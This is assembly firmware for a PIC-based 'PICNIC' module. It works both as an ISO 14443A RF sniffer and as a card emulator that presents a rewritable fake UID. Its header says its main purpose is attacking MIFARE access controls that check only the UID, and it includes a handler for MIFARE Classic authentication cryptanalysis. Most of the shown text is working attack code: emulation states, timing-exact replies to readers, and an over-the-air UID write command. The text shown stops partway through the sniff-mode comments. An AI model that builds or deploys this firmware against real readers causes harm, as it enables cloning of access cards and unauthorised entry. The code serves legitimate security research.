;; Fake UID & Sniffer for HF cards according to ISO 14443A.
;;
;; 				THE TARGET PLATFORM IS THE PICNIC MODULE
;;
;; For educational purpose only can be freely redistributed, modified, and used, 
;; provided the copyright notice is preserved for the original parts of the code.
;; Anyway, everybody has to be warned that they use this code on their own risk!
;; 
;; Primary target is a demonstration of attacks on MIFARE-UID-ONLY access controls.
;; The core procedures MillerDecoder and ManchesterCoder together with the "main"
;; can be used for various explorations of ISO 14443A as well.
;;
;; This is a dual function dual boot code. When DTR signal
;; (cf. the scheme) is low, the device behaves as a terminal data sniffer.
;; When DTR is high (inactive), the device behaves as a fake UID card emulator.
;; This behavior can be affected by the programme configuration flags (PCF).
;; UID together with PCF can be changed via a reader command, cf. the 
;; WriteEE command handler bellow.
;;
;; (c) Copyright 2008-2009 Tomas Rosa, crypto.hyperlink.cz, t_rosa@volny.cz
;; 					Version 1.3.2 - February 2009
;;
;;	What is new (with respect to a version 1.3.(1)):
;;	   - The MillerDecoder initialization part redesigned to support the shortest
;;		 possible Tx switch pause (1172*T_c = 293*T_inst).
;;
;;	   - The MillerDecoder post-synchronization further precised.
;;
;;	What is new (with respect to a version 1.1):
;;	   - The MillerDecoder procedure was extended to:
;;			 i) support frames that are up to 64 bytes long,
;;			ii) support parity bit capturing into the shadow page buffer.
;;		 The Var_MD_ByteCount variable now counts the number of bytes (even incomplete)
;;		 received, while the older Var_MD_BitCount continues to count the number
;;		 of bits modulo 256. Of course, modulo 8 would be more stylish, but
;;		 modulo 256 preserves certain backward compatibility with existing
;;		 code. 
;;		 It is driven by the PCFMillerParity flag whether the parity bit capturing
;;		 is done or not. ATTENTION: As this feature is meant especially for the
;;		 sniffing purpose, the procedure is allowed to OVERWRITE the variables
;;		 of the deferred print jobs, since these are meant especially for those
;;		 no-sniffing purposes. Perhaps, we can do something about it in later
;;		 versions, but it does not seem to be the biggest issue right now.
;;
;;     - SendUARTBuffer says 00 CC if receiver errs and handles frames
;;		 up to 64 bytes long. It uses two-byte expression of the length as
;;		 the number of bytes followed by the number of bits valid in the
;;		 last byte (1 to 8). It also reflects the PCFMillerParity flag.
;;
;;     - Attention: UART speed changed from f_osc/128 to f_osc/64 to provide
;;		 a higher bandwidth for the sniffing protocol.
;;
;;	   - Support for MIFARE Classic cryptanalysis added. Its core is the
;;		 MifareHackAuthCmd handler. This also required adding the support
;;		 for deferred (i.e. using more than one RF transaction) commands
;;		 in the main dispatcher (cf. comments on the cmd handlers below).
;;		 Also reasonable seemed to be adding the support for deferred UART-print
;;		 jobs that is also handled by the main dispatcher.
;;		 ATTENTION - to use this feature the FAKE_UART directive must be set,
;;		 as this function requires UART output to be ready.
;;		 The semantics of the implementation is inspired by the article
;;		 Garcia, F.-D., et al.: Dismantling MIFARE Classic, ESORICS 2008.
;;
;;	   - Some synchro-code equations have been precised (i.e. debugged).
;;
;;	   - Some stupid comments have been corrected :-)
;;
;; Compiles by MPASM from MPLAB IDE 7.60, cf. www.microchip.com.


#include <p16f648a.inc>

	radix dec

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Configuration word
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; We expect X-tal based oscillator at 13.56 MHz.
; ATTENTION - Using Power-Up timer prevents EEPROM writting
; for 72 ms since reset!!! (cf. par. 13.6. - Protection Against Spurious Write)
__config _CP_OFF & _DATA_CP_OFF & _HS_OSC & _PWRTE_ON & _WDT_OFF & _BOREN_OFF & _LVP_OFF & _MCLRE_ON

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; EEPROM DATA
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	org		0x2100
; Sample UID
	de		0x3C, 0xF2, 0xE2, 0xDA
; Programme configuration flags
	de		0x01	; PCFNoSniff = 1, PCFMillerParity = 0
; Challenges for Mifare Authentication hack (can be at most 4 different values)
; Regardless the total number of different values, 4*4 = 16 bytes of EEPROM are
; always reserved and scanned.
	de		0xA1, 0xA2, 0xA3, 0xA4
	de		0xB1, 0xB2, 0xB3, 0xB4
	de		0xC1, 0xC2, 0xC3, 0xC4
	de		0xD1, 0xD2, 0xD3, 0xD4

; EEPROM variables offsets
EE_UID		equ	0
EE_PCF		equ	4
EE_Challenge1	equ	5
EE_Challenge2	equ	9
EE_Challenge3	equ	13
EE_Challenge4	equ	17

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; The other preprocessor stuff
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

; global compilation switch indicators
;#define DEBUG_CODE	; compile general debug code stuff
#define FAKE_UART	; allow debug UART output even from the Fake UID mode
; Remember to disable the Sniff mode to use UART while in Fake UID mode
; cf. EE_PCF variable.

; comparator assignments
#define CMP_DEMOD C2OUT

; GPIO pin assignments on PORTA

; GPIO pin assignments on PORTB
#define PB_MOD 5
#define PB_BLUE_LED 7

; macros for time delays (cycle-counted busy waits)
; these are only approximate
; when space becomes critical, rewrite them as calls to a common procedure
DebounceWait macro label
    movlw   60
    movwf   Var_MilliCount
label
    WaitMillisecond
    decfsz  Var_MilliCount, f
    goto    label
endm
WaitMillisecond macro	; T = 256 * (5*2 + 3) * T_inst
    clrf    Var_MicroCount
    goto    $ + 1
    goto    $ + 1
    goto    $ + 1
    goto    $ + 1
    goto    $ + 1
    decfsz  Var_MicroCount, f
    goto    $ - 6
endm
Wait302us	macro	; T = 256 * 4 * T_inst
	clrf	Var_MicroCount
	nop
	decfsz	Var_MicroCount, f
    goto    $ - 2
endm

; macro for finalizing hot-one based right-rotated bit
; pointed to by FSR
FinalizeHORR macro
	rrf		INDF, f
	btfss	STATUS, C
	goto	$-2
endm

; macros for straight-forward load modulation
; M1 - modulates the carrier with one period of 847.5 kHz
M1	macro
	bsf		PORTB, PB_MOD
	nop
	bcf		PORTB, PB_MOD
	nop
endm

; M4 - modulates the carrier with four periods of 847.5 kHz
M4	macro
	M1
	M1
	M1
	M1
endm

; M8 - modulates the carrier with eight periods of 847.5 kHz
M8	macro
	M4
	M4
endm

; P1 - stops modulation for one period of 847.5 kHz
P1	macro
	goto	$+1
	goto	$+1
endm

; P4 - stops modulation for four periods of 847.5 kHz
P4	macro
	P1
	P1
	P1
	P1
endm

; P8 - stops modulation for eight periods of 847.5 kHz
P8	macro
	P4
	P4
endm

; UART transmission
; when space becomes critical, rewrite them as calls to a common procedure
; !!! Assumes BANK 0 !!!
SendUARTByte2	macro
	btfss	PIR1, TXIF
	goto	$-1			; wait for empty TXREG
	movwf	TXREG		; send the value
endm

SendUARTByte	macro	value
	movlw	value		; take the byte
	SendUARTByte2		; and send it
endm

; dual boot check
; after the dual boot check having been perfomed, the current context can
; be determined using the following macros
; !!! Assumes BANK 0 !!!
IfSniffMode	macro	; executes the very next instruction when Sniff mode is active
	btfsc	CMCON, C1INV
endm

IfNotSniffMode	macro 	; executes the very next instruction when Sniff mode is NOT active
	btfss	CMCON, C1INV
endm

; variables in Bank 0
cblock 0x20
    Var_MD_Buf:64	; Miller decoder output buffer
	Var_MD_ByteCount	; number of *bytes* (even incomplete) receiced by the Miller decoder
	Var_MD_BitCount		; number of *bits* received by the Miller decoder
	Var_MD_a		; Miller decoder internals
	Var_MD_b		; Miller decoder internals
	Var_MD_c		; Miller decoder internals
endc

; variables in Bank 1
cblock	0xA0
    Var_MD_BufShadow:32	; Miller decoder output shadow buffer (cf. MillerDecoderP)
						; ATTENTION - the buffer can consume up to 64 bytes when
						; neccessary hence overwriting the following variables
						; (cf. the version change comments above)
	Var_DP_Len			; length of deferred print job
	Var_DP_Buf:47		; deferred print job buffer (can be shorten if necessary)
endc
#define DP_BUF_LEN 47

; variables in Bank 2
cblock 0x120
	Var_MC_BitCount ; number of bits to be transmitted by Manchester coder
	Var_MC_Mask		; selected bit mask	
	Var_MC_ATQA:3	; ATQA constant extended (parity bits)
	Var_MC_UID:6	; UID loaded from EEPROM and extended (checksum byte, parity bits)
	Var_MC_SAK:4	; SAK constant extended (CRC, parity bits)
	Var_MC_Buf:1	; buffer for ad hoc transmissions
	Var_MC_ActualChallenge:5	; actuall challenge for Mifare authentication hack
	Var_ACIndex		; actuall challenge index {0, 1, 2, 3}
endc

; variables visible in all Banks
cblock 0x70
	Var_Flags		; common runtime flags
	Var_EE_PCF		; copy of programme conf. flags from EEPROM
	Var_Count1	; general purpose counter
	Var_Count2	; dtto (primary for subroutines)
	Var_Temp		; general purpose register
	Var_Temp2		; general purpose register (primary for subroutines)
	Var_MilliCount
	Var_MicroCount	; separate timer counters (independent on Var_Count1,2)
	Var_TxOffset	; Tx offset in 4*T_inst steps (used by TX-ing command handlers)
	Var_Deferred_ID	; identifies cmd handler together with its substate
	Var_W_Shadow	; for W preservation
	Var_STATUS_Shadow	; for STATUS preservation
	Var_FSR_Shadow		; for FSR preservation
endc

; IDs of deferred commands
#define DC_MFAuthHack1 1	; MifareHackAuthCmd waits for terminal cryptogram (phase II)
#define DC_MFAuthHack2 2	; MifareHackAuthCmd hopes for encrypted HLT command (phase III)

; flags of Var_Flags
; (UNUSED now) #define MDOverflow 0	; Miller decoder indicates buffer overflow
#define MDCarrierLost 1	; Miller decoder indicates basic carrier disappeared
#define CmdHandled 2	; command handled in the last command handler
#define StayActive 3	; commnad handler requests to stay in active mode
#define CmdDeferred 4	; command handler waits for further terminal data
						; (suitable for e.g. authentication protocols)

; flags of Var_EE_PCF
#define	PCFNoSniff 0		; stay in Fake UID mode even for DTR low
#define PCFMillerParity 1	; retransfer parity bits in the sniff mode
							; currently, it is ignored in the fake UID mode
							; to prevent buffer collisions with the deferred
							; print jobs

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Reset
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	org		0
Reset
    goto    Init

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; ISR
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
	org		4
Isr:
	retfie		; we do not handle interrupts, neither ignore them

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Here we start after power-on reset.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Init:
; perform dual boot check
; keep PORTA_3 as INPUT until the invertor for CMP1 is set correctly!
	banksel	VRCON		; bank 1
	movlw	0xE5
	movwf	VRCON		; V_ref ON
	bcf		STATUS, RP0	; bank 0
	movlw	0x36
	movwf	CMCON		; initialize the comparator module
	movlw	0x10
	movwf	Var_MicroCount
	decfsz	Var_MicroCount, f
	goto	$-1			; wait for V_ref and CMP1 to stabilize
	btfsc	CMCON, C1OUT	; test the DTR signal
	bcf		CMCON, C1INV	
; since here, the state is determined by C1INV
; C1INV = H iff sniff mode is active
; C1INV = L iff fake UID mode is active

; initialize I/O ports
; PORTA_3 must be set as OUTPUT now to allow
; eventual reboot when DTR status changes
	clrf	PORTA
	clrf	PORTB	; modulator off, blue LED on

	bsf		STATUS, RP0	; bank 1
	movlw	0x27	; note that TRISA_2 must be 1 to allow V_ref output
	movwf	TRISA
; for UART mode of RB1 and RB2 (assume the RS232 module is connected even for the fake UID mode)
; we should drive RB_1,2 as inputs
; RB3 is also input, as it trigers the CCP unit
; the rest of PORTB is configured as output (possibly constant in L state)	
	movlw	0x0E	
	movwf	TRISB

; initialize comparator interrupts
; we do not use the ISR - just the interrupt indicators from PIR1
; and their effect on the sleep mode termination
; so we keep GIE = 0 !
	movlw	1 << CMIE
	movwf	PIE1
	movlw	1 << PEIE
	movwf	INTCON
	
; initialize TMR0 module
	bsf		OPTION_REG, T0CS	; counter mode
	bcf		OPTION_REG, T0SE	; increment on the rising edge

; load the programme configuration flags
	movlw	EE_PCF
	movwf	EEADR
	bsf		EECON1, RD
	movf	EEDATA, w
	movwf	Var_EE_PCF

; decide which main routine to start
	btfsc	Var_EE_PCF, PCFNoSniff	; if the Sniff mode is disabled
	goto	FakeUID					; go to Fake UID anyway
	banksel	CMCON					; otherwise
	IfSniffMode						; decide according to the DTR state
	goto	SniffMode

;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Fake UID mode
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

FakeUID:
; ignore the possible parity capturing request to prevent
; buffer collisions with deferred print jobs
	bcf		Var_EE_PCF, PCFMillerParity

; initialize protocol constants and variables
; ATQA = 0x04 0x00 (little endian!!!)
	banksel	Var_MC_ATQA			; bank 2
	movlw	0x80	; hot one init
	movwf	Var_MC_ATQA
	movwf	Var_MC_ATQA + 1
	movwf	Var_MC_ATQA + 2
	movlw	Var_MC_ATQA
	movwf	FSR
	bsf		STATUS, IRP		; bank 2,3 for INDF
	movlw	0x04
	call	ParityExtender
	clrw
	call	ParityExtender
	FinalizeHORR
; SAK = 0x08 0xB6 0xDD
	movlw	0x80	; hot one init
	movwf	Var_MC_SAK
	movwf	Var_MC_SAK + 1
	movwf	Var_MC_SAK + 2
	movwf	Var_MC_SAK + 3
	movlw	Var_MC_SAK
	movwf	FSR
	movlw	0x08
	call	ParityExtender
	movlw	0xB6
	call	ParityExtender
	movlw	0xDD
	call	ParityExtender
	FinalizeHORR
; actuall challenge for Mifare auth. hack is read
	movlw	0x03
	movwf	Var_ACIndex	; make the counter restart
	call	FetchAC		; this subroutine is reused later on

#ifdef FAKE_UART
; UART init - debug code here (should remain in Sniff mode only)
; do not forget to turn the Sniff mode off to use UART and stay in the Fake UID mode
; cf. EEPROM programme configuration flags
	banksel	SPBRG			; bank 1
	movlw	0x00
	movwf	SPBRG			; 13.56 MHz / 64 =' 212 kbps, i.e. 2-times the speed of ISO 14443
	bcf		TXSTA, BRGH		; low speed constant
	bcf		TXSTA, SYNC		; asynchronous mode
	bcf		TXSTA, TX9		; 8 bits
	bcf		STATUS, RP0		; bank 0
	bsf		RCSTA, SPEN		; serial port enable
	bsf		STATUS, RP0		; bank 1
	bsf		TXSTA, TXEN		; enable TX
	Wait302us				; RB2 was an input tied to L, so we wait for its stabilization
; deferred print job init (we are still in bank 1)
	clrf	Var_DP_Len
; UART greeting - it is different than in the sniff mode to allow mode distinguishing
	banksel	TXREG		; bank 0
	SendUARTByte	'O'
	SendUARTByte	'K'
	SendUARTByte	0x0D
	SendUARTByte	0x0A
#endif ; FAKE_UART

; if there is no carrier signal, go to sleep
; otherwise enter an IDLE state
GoToSleep:
#ifdef FAKE_UART
	call	HandleDP		; handle eventual deferred print job
#endif
		
	bcf		STATUS, RP0
	bcf		STATUS, RP1		; bank 0 with an assurance
	
GoToSleep2:
	WaitMillisecond			; eliminate short drop outs
	movf	CMCON, w		; read both C1OUT and C2OUT to cancel mismatch cond.
	andlw	1 << CMP_DEMOD
	btfss	STATUS, Z
	goto	WakeUpNow

#ifdef FAKE_UART
; notify about field drop out - debug code
	SendUARTByte	'@'		; this string differs from that one
	SendUARTByte	0x0D	; used in the sniff mode as we
	SendUARTByte	0x0A	; prefer its human readability here
	movlw	9
	movwf	Var_Count1
	nop
	decfsz	Var_Count1, f	; wait for UART TX to
	goto	$-2				; start surely
	bsf		STATUS, RP0		; bank 1
	btfss	TXSTA, TRMT		; wait for last TX
	goto	$-1				; completion before going to sleep
	bcf		STATUS, RP0		; bank 0
#endif ; FAKE_UART

	bcf		PIR1, CMIF
	bsf		PORTB, PB_BLUE_LED
	sleep
WakeUpNow:
	bcf		PORTB, PB_BLUE_LED
	WaitMillisecond			; eliminate short "drop ins"
	btfss	CMCON, CMP_DEMOD
	goto	GoToSleep2

; actual UID is read from EEPROM
; this part must be here to allow UID change
; without a HW reset
	banksel	Var_MC_UID	; bank 2
	movlw	0x80
	movwf	Var_MC_UID
	movwf	Var_MC_UID + 1
	movwf	Var_MC_UID + 2
	movwf	Var_MC_UID + 3
	movwf	Var_MC_UID + 4
	movwf	Var_MC_UID + 5
	movlw	Var_MC_UID
	movwf	FSR
	bsf		STATUS, IRP	; bank 2,3 for INDF
	banksel	EEADR		; bank 1
	movlw	EE_UID
	movwf	EEADR
	bsf		EECON1, RD
	movf	EEDATA, w
	movwf	Var_Temp	; compute BCC
	call	ParityExtender	; UID_0
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w
	xorwf	Var_Temp, f	; compute BCC
	call	ParityExtender	; UID_1
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w
	xorwf	Var_Temp, f	; compute BCC
	call	ParityExtender	; UID_2
	incf	EEADR, f
	bsf		EECON1, RD
	movf	EEDATA, w
	xorwf	Var_Temp, f	; compute BCC
	call	ParityExtender	; UID_3
	movf	Var_Temp, w
	call	ParityExtender	; CHECKSUM
	FinalizeHORR
; we can stay in bank 2, the following call to MillerDecoder
; will set the bank 0 correctly
	
; STATE IDLE - after a successful wake up, we are here
IdleState:
#ifdef FAKE_UART
	call	HandleDP	; handle eventual deferred print job
	banksel	TXREG
	SendUARTByte	'I'	; identify IDLE state
#endif

; wait for REQA or WUPA and reply with ATQA
	call	MillerDecoder
	btfsc	Var_Flags, MDCarrierLost
	goto	GoToSleep
	movlw	0x07
	subwf	Var_MD_BitCount, w
	btfss	STATUS, Z
	goto	IdleState
	movlw	0x26	; REQA
	subwf	Var_MD_Buf, w
	btfsc	STATUS, Z
	goto	ISREQA
	movlw	0x52	; WUPA
	subwf	Var_MD_Buf, w
	btfss	STATUS, Z
	goto	IdleState
; WUPA received
; last bit was 1, so we have to delay TX by 1236*T_c = 309*T_inst
	movlw	29
	goto	IdleDelayTX1
ISREQA:
; REQA received
; last bit was 0, so we have to delay TX by 1172*T_c = 293*T_inst
	movlw	26
	nop
IdleDelayTX1:
	movwf	Var_Count1
IdleDelayTX2:
	nop
	decfsz	Var_Count1, f
	goto	IdleDelayTX2
	movlw	Var_MC_ATQA
	movwf	FSR
	banksel	Var_MC_BitCount
	movlw	0x12				; 2 bytes + parity bits
	movwf	Var_MC_BitCount
	call	ManchesterCoder		; TX ATQA and enter the READY state

; STATE READY - after REQA or WUPA, we are here
ReadyState:

#ifdef FAKE_UART
	banksel	TXREG
	SendUARTByte	'R'	; identify READY state
#endif

; wait for ANTICOL or SEL cmd, reply with UID
; when something strange received, go to the IDLE state
	call	MillerDecoder
	btfsc	Var_Flags, MDCarrierLost
	goto	GoToSleep
	movlw	0x48				; 9 bytes
	subwf	Var_MD_BitCount, w	; test for SEL cmd
	btfsc	STATUS, Z
	goto	RSSel
	movlw	0x10				; 2 bytes
	subwf	Var_MD_BitCount, w	; test for ANTICOL cmd
	btfss	STATUS, Z
	goto	IdleState			; return to the IDLE state
; it seems as the ANTICOL cmd - perform another quick tests for that
	movlw	0x93		; 1st cascade level
	subwf	Var_MD_Buf, w
	btfss	STATUS, Z
	goto	IdleState
	movlw	0x20		; no UID part - full broadcast
	subwf	Var_MD_Buf + 1, w
	btfss	STATUS, Z
	goto	IdleState
; last bit was zero (odd parity for 0x20), so we use
; the shorter total delay of 293*T_inst
	movlw	24
	movwf	Var_Count1
	goto	$+1
	nop
	decfsz	Var_Count1, f
	goto	$-2
; send UID
	movlw	Var_MC_UID
	movwf	FSR
	banksel	Var_MC_BitCount
	movlw	0x2D		; 5 bytes + parity bits
	movwf	Var_MC_BitCount
	call	ManchesterCoder
	goto	ReadyState	; stay here in this state
RSSel:
; it seems as the SEL cmd - perform another quick tests for that
	movlw	0x93		; 1st cascade level
	subwf	Var_MD_Buf, w
	btfss	STATUS, Z
	goto	IdleState
	movlw	0x70		; full NVB
	subwf	Var_MD_Buf + 1, w
	btfss	STATUS, Z
	goto	IdleState
; as we ignore the anticollision stuff, we can assume this is a valid SEL now
; so we reply with SAK and proceed to the ACTIVE state
	movf	Var_MD_Buf + 8, w
	call	OddParity		; this was the last bit of the RX data
	andlw	0x80
	movlw	20			; assume shorter total delay of 293*T_inst
	btfss	STATUS, Z
	addlw	4			; and extend it when necessary to 309*T_inst
; delay the TX then send SAK
	movwf	Var_Count1
	nop
	decfsz	Var_Count1, f
	goto	$-2
	movlw	Var_MC_SAK
	movwf	FSR
	banksel	Var_MC_BitCount
	movlw	0x1B		; 3 bytes + parity bits
	movwf	Var_MC_BitCount
	call	ManchesterCoder

; STATE ACTIVE - after SEL, we are here
	bcf		Var_Flags, CmdDeferred	; terminate all possibly postponed jobs
ActiveState:

#ifdef FAKE_UART
	banksel	TXREG
	SendUARTByte	'A'	; identify ACTIVE state
#endif

	call	MillerDecoder
	btfsc	Var_Flags, MDCarrierLost
	goto	GoToSleep
; tests for special commands follow
; first - we do the synchronization and set the next TX frame countdown
	bcf		Var_Flags, CmdHandled
	rrf		Var_MD_BitCount, w
	movwf	Var_Temp
	rrf		Var_Temp, f
	rrf		Var_Temp, w		; assume a byte aligned length
	andlw	0x1F
	addlw	Var_MD_Buf - 1
	movwf	FSR				; offset of the
	movf	INDF, w			; last byte
	call	OddParity		; test the last parity bit
	clrf	Var_TxOffset	; assume the last bit was 0
	andlw	0x80
	btfss	STATUS, Z
	bsf		Var_TxOffset, 2	; and extend the delay if it was 1
	nop
	goto	$+1				; sync to z*4*T_inst frame
	movlw	24			; remaining time to the next TX frame in 4*T_inst 
	addwf	Var_TxOffset, f	; valid for the very next instruction
; first deferring cmd handler
#ifdef FAKE_UART
	call	MifareHackAuthCmd		; test for Mifare Authenticate cmd
	btfsc	Var_Flags, CmdHandled
	goto	AS1
	addlw	1				; TX time comp. (excl. the 1st call covered by the handler)
	subwf	Var_TxOffset, f	; adjust the TX offset
#else
	messg	"MIFARE Classic cryptanalysis support NOT ACTIVATED."&& 
	"It requires FAKE_UART to be set!"
#endif
; first NOT deferring cmd handler
	call	WriteEECmd		; test for EEPROM write command
	btfsc	Var_Flags, CmdHandled
	goto	AS1
	addlw	1				; TX waste time compensation
	subwf	Var_TxOffset, f	; adjust the TX offset
; next cmd handler
	call	MifareNACKCmd
	btfsc	Var_Flags, CmdHandled
	goto	AS1
; no more cmd handlers - try the HLTA
; HLTA is handled right here without a special cmd handler
	movlw	0x20		; 4 bytes
	subwf	Var_MD_BitCount, w
	btfss	STATUS, Z
	goto	IdleState
; it seems to be HLTA cmd - check it (we ignore the CRC)
	movlw	0x50
	subwf	Var_MD_Buf, w
	btfss	STATUS, Z
	goto	IdleState
	movf	Var_MD_Buf + 1, f
	btfsc	STATUS, Z
	goto	HaltState	; HLTA received - proceed to the HALT State - no TX here
	bcf		Var_Flags, StayActive	; we will return to the IDLE state anyway
AS1:
	btfsc	Var_Flags, StayActive
	goto	ActiveState
	goto	IdleState

; STATE HALT - the "dual" state to the IDLE, but only WUPA is accepted here
HaltState:
#ifdef FAKE_UART
	call	HandleDP	; handle eventual deferred print job
	banksel	TXREG
	SendUARTByte	'H'	; identify HALT state
#endif

	call	MillerDecoder
	btfsc	Var_Flags, MDCarrierLost
	goto	GoToSleep
	movlw	0x07
	subwf	Var_MD_BitCount, w
	btfss	STATUS, Z
	goto	HaltState
	movlw	0x52	; WUPA
	subwf	Var_MD_Buf, w
	btfss	STATUS, Z
	goto	HaltState
; WUPA received
; last bit was 1, so we have to delay TX by 1236*T_c = 309*T_inst
	movlw	30
	movwf	Var_Count1
	goto	$+1
	nop
	decfsz	Var_Count1, f
	goto	$-2
	movlw	Var_MC_ATQA
	movwf	FSR
	banksel	Var_MC_BitCount
	movlw	0x12				; 2 bytes + parity bits
	movwf	Var_MC_BitCount
	call	ManchesterCoder		; TX ATQA and enter the READY-2 state

; STATE READY 2 - after WUPA in the state HALT, we are here
Ready2State:

#ifdef FAKE_UART
	banksel	TXREG
	SendUARTByte	'S'	; identify READY II state
#endif

; wait for ANTICOL or SEL cmd, reply with UID
; when something strange received, go to the HALT (NOT IDLE !!!) state
	call	MillerDecoder
	btfsc	Var_Flags, MDCarrierLost
	goto	GoToSleep
	movlw	0x48				; 9 bytes
	subwf	Var_MD_BitCount, w	; test for SEL cmd
	btfsc	STATUS, Z
	goto	RS2Sel
	movlw	0x10				; 2 bytes
	subwf	Var_MD_BitCount, w	; test for ANTICOL cmd
	btfss	STATUS, Z
	goto	HaltState			; return to the HALT state
; it seems as the ANTICOL cmd - perform another quick tests for that
	movlw	0x93		; 1st cascade level
	subwf	Var_MD_Buf, w
	btfss	STATUS, Z
	goto	HaltState
	movlw	0x20		; no UID part - full broadcast
	subwf	Var_MD_Buf + 1, w
	btfss	STATUS, Z
	goto	HaltState
; last bit was zero (odd parity for 0x20), so we use
; the shorter total delay of 293*T_inst
	movlw	24
	movwf	Var_Count1
	goto	$+1
	nop
	decfsz	Var_Count1, f
	goto	$-2
; send UID
	movlw	Var_MC_UID
	movwf	FSR
	banksel	Var_MC_BitCount
	movlw	0x2D		; 5 bytes + parity bits
	movwf	Var_MC_BitCount
	call	ManchesterCoder
	goto	Ready2State	; stay here in this state
RS2Sel:
; it seems as the SEL cmd - perform another quick tests for that
	movlw	0x93		; 1st cascade level
	subwf	Var_MD_Buf, w
	btfss	STATUS, Z
	goto	HaltState
	movlw	0x70		; full NVB
	subwf	Var_MD_Buf + 1, w
	btfss	STATUS, Z
	goto	HaltState
; as we ignore the anticollision stuff, we can assume this is a valid SEL now
; so we reply with SAK and proceed to the ACTIVE 2 state
	movf	Var_MD_Buf + 8, w
	call	OddParity		; this was the last bit of the RX data
	andlw	0x80
	movlw	20			; assume shorter total delay of 293*T_inst
	btfss	STATUS, Z
	addlw	4			; and extend it when necessary to 309*T_inst
; delay the TX tha SAK
	movwf	Var_Count1
	nop
	decfsz	Var_Count1, f
	goto	$-2
	movlw	Var_MC_SAK
	movwf	FSR
	banksel	Var_MC_BitCount
	movlw	0x1B		; 3 bytes + parity bits
	movwf	Var_MC_BitCount
	call	ManchesterCoder

; STATE ACTIVE 2 - after SEL in the HALT subtree, we are here
	bcf		Var_Flags, CmdDeferred	; terminate all possibly postponed jobs
Active2State:

#ifdef FAKE_UART
	banksel	TXREG
	SendUARTByte	'B'	; identify ACTIVE II state
#endif

	call	MillerDecoder
	btfsc	Var_Flags, MDCarrierLost
	goto	GoToSleep
; tests for special commands follow
; first - we do the synchronization and set the next TX frame countdown
	bcf		Var_Flags, CmdHandled
	rrf		Var_MD_BitCount, w
	movwf	Var_Temp
	rrf		Var_Temp, f
	rrf		Var_Temp, w		; assume a byte aligned length
	andlw	0x1F
	addlw	Var_MD_Buf - 1
	movwf	FSR				; offset of the
	movf	INDF, w			; last byte
	call	OddParity		; test the last parity bit
	clrf	Var_TxOffset	; assume the last bit was 0
	andlw	0x80
	btfss	STATUS, Z
	bsf		Var_TxOffset, 2	; and extend the delay if it was 1
	nop
	goto	$+1				; sync to z*4*T_inst frame
	movlw	24			; remaining time to the next TX frame in 4*T_inst 
	addwf	Var_TxOffset, f	; valid for the very next instruction
; first deferring cmd handler
#ifdef FAKE_UART
	call	MifareHackAuthCmd		; test for Mifare Authenticate cmd
	btfsc	Var_Flags, CmdHandled
	goto	A2S1
	addlw	1				; TX time comp. (excl. the 1st call covered by the handler)
	subwf	Var_TxOffset, f	; adjust the TX offset
#else
	messg	"MIFARE Classic cryptanalysis support NOT ACTIVATED."&& 
	"It requires FAKE_UART to be set!"
#endif
; first NOT deferring cmd handler
	call	WriteEECmd		; test for EEPROM write command
	btfsc	Var_Flags, CmdHandled
	goto	A2S1
	addlw	1				; TX waste time compensation
	subwf	Var_TxOffset, f	; adjust the Tx offset
; next cmd handler
	call	MifareNACKCmd
	btfss	Var_Flags, CmdHandled
; no more cmd handlers
	goto	HaltState		; return to the HALT state anyway
A2S1:
	btfsc	Var_Flags, StayActive
	goto	Active2State
	goto	HaltState


;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Sniff mode
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;; Output format:
;;		- at start, it sends "PICNIC x.y READYw\r\n", where x.y is the version no.
;;		  and w is the (possible empty) flag string (currently, <p> means parity
;;		  processing is on)
;;		- for field drop out causing sleep mode to begin, it sends OO FF
;;
;;	If parity capturing is off (PCFMillerParity = 0):
;;		- after terminal data reception, it sends Length || Data
;;		- Length = (byteLen, alignment), where byteLen is the number
;;		  of bytes received (even incomplete bytes count) and alignment
;;		  is the number of valid bits in the last byte (1 to 8)
;;		- last data byte (may be incomplete) is aligned to the right
;;		- after incorrect reception (some cases) it sends 00 CC
;;
;;	If parity capturing is off (PCFMillerParity = 1):
